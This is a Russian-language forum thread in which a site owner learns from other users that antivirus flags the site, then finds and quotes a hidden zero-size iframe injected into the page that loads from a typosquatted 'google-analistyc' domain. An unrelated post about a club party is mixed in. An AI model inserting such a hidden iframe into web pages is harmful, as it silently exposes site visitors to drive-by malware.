![]() |
Цитата:
|
какой еще троян? никаких скриптов и прочего, флеш+хтмл |
реальный трабл на сайте.. вылетает каждые 5 сек Not Found The requested URL /img/us/404.php was not found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. Apache/2.2.3 (CentOS) Server at mysexydreams.net Port 80 |
блин, я хер знает) у меня все нормально работает ) перезалью вечером сорсы на хост |
не знаю откуда. у меня касперский сразу его выдал при открытии сайта. |
на mysexdreams.com ломиться начинает )) |
В кратце о патти) Получил море позитива! Клуб уютный, и очень таки атмосферный, особенно находясь в своей добротной компаниИ!Народу мало!Но тут понятно, воскресенье, ночь, у кого сессия, у кого что! звук нормальный, но можно лучше!Пиво дорогое, но можно выйти на улицу, киоск рядом)))Свой микрофон оставил там, это плохо(Но Кирил сказал, что заберет, и это меняет данную полоротость!Вообщем спасибо тем 10 - 20 людям, которые хотя бы головой кочали у сцены, и Кирилу, за организацию патти! Ждем от тебя новых вечеринок! |
Пиво дорогое зато водка по 500 рублей...)))) |
ахуеть, и вправду вирус поселился каким-то хуй пойми каким образом в страницу внизу добавилось <!-- ~ --><iframe src="http://google-analistyc.net/in.cgi?3" width="0" height="0" style="display:none"></iframe><!-- ~ --> пездец :mad: |
Часовой пояс GMT +3, время: 13:54. |